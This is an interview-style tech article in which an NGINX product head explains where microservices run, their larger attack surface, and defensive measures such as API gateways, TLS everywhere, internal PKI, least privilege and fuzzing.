I find the topic of microservices fascinating, so I wrote earlier this month about the concept of microservices and how to secure them. In a nutshell, microservices are like application ingredients which usually perform one set or specific function. What’s interesting about them is how they can be bolted together almost like Frankenstein’s monster (but with better stability) to help standardize code, reduce complexity and add scalability as well as flexibility to the application development and maintenance process.
There are some noteworthy elements in the realms of the cloud, differences from standard applications and security. I spoke with Owen Garrett, Head of Products at NGINX to learn more about the topic.
TechRepublic: Are microservices a cloud phenomena, in-house or hybrid?
Owen Garrett: “You can deploy microservices anywhere, on-premise, in the public cloud, or hybrid. The early adopters are mostly cloud based, i.e. Netflix, but as enterprises adopt microservices, a good portion will be running them out of their private data center.
The microservices approach to application architecture arose partly in response to the need to build “Cloud-Native Applications”. The cloud-native pattern requires a decoupled application architecture that is distributed, scalable and fault-tolerant, and microservices meet these requirements perfectly. That said, there’s nothing in the microservices approach that limits them to the cloud.
Microservices applications are comprised of clusters of small (‘micro’) applications (‘services’) that communicate across a network. These small applications are typically packaged using containers, so they generally require a platform that can deploy containers rapidly and efficiently, and which provides the advanced networking services (discovery and load balancing) necessary to support them. Some cloud providers do provide specialised container hosting services, but it’s more common for enterprises to deploy Kubernetes, Docker or Mesos platforms themselves. These platforms can be deployed almost anywhere, from a single developer’s laptop to a thousand-server on-premise or cloud data center.”
TR: Can you elaborate on how microservices are different from legacy applications?
OG: “There is a larger attack surface involved. Each client directly accesses a different subset of APIs and web endpoints. This distributed nature means that many more components are potential intrusion points and need to be secured. However, it’s harder for an organization to consistently apply best-practice security practices across all of the components. Once one is breached, you may assume that it can be used as a beachhead to address all of the data that the compound application uses, and the effects may ripple through to other applications that use some of the same services.”
TR: What are some concrete examples of security risks involving microservices?
OG: “Microservices applications rely heavily on the network for inbound traffic (north-south) and for internal inter-service traffic (east-west). The need to secure east-west traffic is new, and one cannot assume that even a single-tenant environment is secure. Anyone who has unauthorized visibility of network traffic – another tenant, or even another microservice – can potentially view or modify sensitive transactions.
TR: Have any of these risks been exploited or leveraged in the real world?
OG: “Passively monitoring traffic like that is very commonplace. Leaked documents show the NSA and other government organizations have monitored and cataloged communications between Google data centers, for example. In response Google started encrypting this traffic, similar to what is advocated for in the previous question.
Though this sort of attack is not specific to microservices, the amount of additional “east-west” network traffic introduced by microservices does make them more susceptible.
Any means that an attacker can use to get access to one component, and then to map out the broader architecture of the application, can be exploited to compromise an application. For example, the HTTPoxy vulnerability that was disclosed in 2016 provided a way to re-route internally-generated requests to a server of the attacker’s choice, allowing an attacker to gain intelligence on the internal architecture and to potentially capture authentication tokens and other sensitive information.
Poor API design can also be exploited to reveal internal information and even customer information. For example, reusing authentication or identifying tokens (or allowing an attacker to brute-force them) is bad practice and can be used to access internal data.”
TR: What do you recommend for a reliable microservice security strategy?
OG: “Any organization that is exposing one or more APIs for external access should deploy some form of API gateway. This does not necessarily need to be a specialised device – for many use cases, organizations use an intelligent reverse proxy that allows them to inspect, authenticate, and rate-limit API requests, only admitting requests that meet appropriate criteria and logging all transactions. It almost goes without saying that all API traffic must be encrypted using TLS. API clients should be authenticated using both an application identifier – and API key or other shared secret – and a user identifier – an SSL certificate or OAuth token. Even anonymous API requests should be required to use a unique user identifier, in order to apply rate limits and to log traffic.
Using SSL internally for all traffic, authenticating and revoking all access using a PKI, and authenticating and inspecting incoming traffic using a reverse proxy goes a long way to meeting the additional, unique needs of securing a microservices applications.
In addition, the internal security of a microservices application should not be forgotten. It’s worthwhile to maintain a healthy degree of suspicion of the other components in the application; even if they can be completely trusted now, there’s no telling how the client base for the application will grow in the future.A good first step is to quickly standardize on using TLS for all internal communications, and build certificate validation of both clients and servers into the architecture from the beginning. Although there is an obvious performance impact from doing so, accelerating proxies can offload and optimize these encrypted connections to minimize any impact.One important benefit of using an internal PKI (public key infrastructure) is that you can assign client and server certificates to each consumer and server within the application. A central PKI makes it very easy for the operations team to revoke access to internal client or server components if they are compromised, or even if they are just retired and replaced by newer containers. Furthermore, a unique identity for the endpoint of each transaction is invaluable when logging and auditing transactions.”
TR: Do you recommend any other methods for securing microservices?
OG: “Intrusion detection by way of identifying anomalous traffic and behaviour (high error rates, frequent cycling of authentication credentials, malformed or repeated requests) to identify and then block bad actors.
Employ a principle of least-privilege for each component within the application – white-list access control, secret protection using revocable tokens, PKI authentication and access control – with particular focus on APIs that can access sensitive data.
And make sure to regularly use intrusion tools and request fuzzers (a technique used to find code issues or security risks by entering large quantities of random information – fuzz – to the system to see if it can be compromised or caused to fail) in development and test to identify issues before an attacker can find them.”
Experts explain why microservices are overhyped
Why microservices are about to have their “cloud” moment
How one e-commerce giant uses microservices and open source to scale like crazy
Microservices 101: The good, the bad and the ugly